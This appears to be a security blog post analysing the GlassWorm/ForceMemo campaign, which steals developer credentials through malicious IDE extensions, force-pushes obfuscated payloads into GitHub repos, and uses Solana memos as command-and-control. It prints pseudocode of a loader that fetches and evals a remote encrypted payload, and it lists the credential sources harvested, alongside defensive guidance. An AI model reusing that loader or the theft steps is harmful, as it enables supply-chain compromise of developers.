Blockchain as Botnet: How GlassWorm Turns Solana Transaction Memos Into an Unstoppable C2 Channel

The security community has long worried about blockchain being used for attacks. But a campaign discovered this month — dubbed GlassWorm/ForceMemo — takes a genuinely novel approach: using Solana's transaction memo field as a decentralized, immutable, takedown-resistant command-and-control (C2) infrastructure for a multi-platform supply chain attack.

This isn't just another malware story. It's a case study in how blockchain's core properties — censorship resistance, immutability, and public accessibility — can be weaponized against the very developer ecosystem that builds on it.

The Kill Chain: From VS Code Extension to Your setup.py

The GlassWorm campaign operates in three distinct phases, each exploiting a different trust boundary:

Phase 1: Credential Harvest via IDE Extensions

GlassWorm initially propagates through malicious VS Code and Cursor extensions published to the OpenVSX marketplace. Once installed, the extension's third-stage payload deploys a credential theft module that harvests:

• GitHub tokens from git credential fill
• VS Code extension storage tokens
• ~/.git-credentials files
• GITHUB_TOKEN environment variables
• npm authentication tokens

The brilliance (if you can call it that) is targeting developer tools. Every compromised developer becomes a vector for Phase 2.

Phase 2: Silent Repository Poisoning (ForceMemo)

With stolen GitHub credentials, the attacker doesn't open pull requests or create new commits. Instead, they:

1. Take the latest legitimate commit on the default branch
2. Rebase it with malicious code appended to key Python files (setup.py, main.py, app.py)
3. Force-push to the default branch

The commit message, author name, and author date are preserved from the original commit. Only the committer date reveals the tampering. The committer email is set to the string null — an operational fingerprint.

This means GitHub's UI shows no new activity. No PR notifications. No commit alerts. The repository looks identical to its clean state unless you compare commit SHAs.

// GitHub Events API — the only evidence
{
  "type": "PushEvent",
  "actor": "legitimate-developer",
  "created_at": "2026-03-10T21:58:02Z",
  "ref": "refs/heads/master",
  "before": "260ca635...",
  "after":  "17849e1b..."
}

The date discrepancies are striking: some repos show author dates from 2017 with committer dates in March 2026 — a 9-year gap that screams tampering if anyone bothers to look.

Phase 3: Solana Blockchain C2

Here's where it gets interesting for the blockchain security community.

The injected Python payload is triple-obfuscated (base64 → zlib → XOR with key 134), stored in a marker variable lzcdrtfxyqiplpd. Once deobfuscated, the malware:

1. Queries a specific Solana wallet address via public RPC endpoints
2. Reads transaction memos to receive instructions
3. Fetches, decrypts, and executes an encrypted JavaScript payload
4. Establishes persistence via SOCKS proxy and hidden VNC server

The same technique was found in the npm supply chain variant, where compromised React Native packages (react-native-country-select v0.3.91 and react-native-international-phone-number v0.11.8, totaling ~30,000 weekly downloads) used Solana RPC to retrieve second-stage payload URLs from memo fields.

Why Solana? The C2 Architecture Deep Dive

Traditional C2 infrastructure has a single point of failure: the server. Take down the domain or IP, and the botnet goes dark. Blockchain C2 inverts this entirely.

Properties That Make Solana Ideal for C2

Property	Traditional C2	Solana Memo C2
Takedown	Domain seizure / IP block	Impossible — data is on-chain forever
Uptime	Depends on server	100% (any RPC endpoint works)
Attribution	Domain registration / hosting records	Wallet address (pseudonymous)
Cost	Server hosting fees	~$0.00025 per transaction
Detection	Known malicious IPs/domains	Legitimate Solana RPC traffic
Update mechanism	Push new config to server	Post new transaction with memo

The memo field approach is particularly clever because:

• Any public Solana RPC endpoint can serve the data — the malware doesn't need to contact attacker infrastructure directly
• Transaction data is immutable — even if detected, the instructions cannot be removed from the blockchain
• New instructions can be posted at any time via new transactions, allowing the attacker to pivot payloads without touching the malware itself
• RPC traffic blends in with legitimate Solana activity, making network-level detection extremely difficult

The Memo Protocol

The npm variant reveals the protocol clearly:

// Pseudocode of the Solana C2 retrieval
async function getCommand() {
  const txs = await solanaRpc.getTransactions(WALLET_ADDRESS);
  for (const tx of txs) {
    const memo = tx.memo;
    const payload = memo.replace(/^\\d+/, '');
    const config = JSON.parse(payload);
    const url = Buffer.from(config.url, 'base64').toString();
    const stage2 = await fetch(url, {
      headers: { 'User-Agent': os.type() }
    });
    const iv = stage2.headers['ivbase64'];
    const key = stage2.headers['secretkey'];
    eval(decrypt(stage2.body, iv, key));
  }
}

Detection and Defense

For Repository Maintainers

1. Enable branch protection rules — require PR reviews, disable force-pushes
2. Monitor the GitHub Events API for unexpected PushEvent entries
3. Search your repos for the marker variable: lzcdrtfxyqiplpd
4. Enable commit signing (GPG/SSH) and reject unsigned commits
5. Audit your IDE extensions — remove unrecognized ones

For Package Consumers

1. Pin dependency versions — never use latest in production
2. Use lockfiles and verify integrity hashes
3. Monitor for unexpected preinstall/postinstall scripts
4. Run npm audit and use tools like Socket.dev or Snyk

For Network Security Teams

1. Monitor outbound Solana RPC calls from non-blockchain workloads
2. Block or alert on getSignaturesForAddress and getTransaction RPC methods in CI/CD
3. Add the known wallet address to threat intelligence feeds

For Blockchain Protocol Designers

Should memo fields have content policies? Probably not — censorship resistance is a feature, not a bug. But the ecosystem should invest in on-chain threat intelligence feeds, opt-in RPC provider filtering, and better memo field monitoring tools.

The Bigger Picture

GlassWorm represents a maturation of blockchain C2:

• Multi-chain support (Solana chosen for speed and cost)
• Integration with supply chain attacks (not just standalone malware)
• Self-propagating (compromised developers → compromised repos → more compromised developers)

The campaign has compromised hundreds of GitHub repositories and npm packages with 130,000+ monthly downloads. The C2 infrastructure has been active since November 2025.

As blockchain protocols get faster and cheaper, expect this attack pattern to become standard in the threat actor playbook.

---

IoCs and Resources:

• GitHub search for affected repos
• StepSecurity ForceMemo analysis
• Sonatype npm analysis
• Compromised npm packages: react-native-country-select v0.3.91, react-native-international-phone-number v0.11.8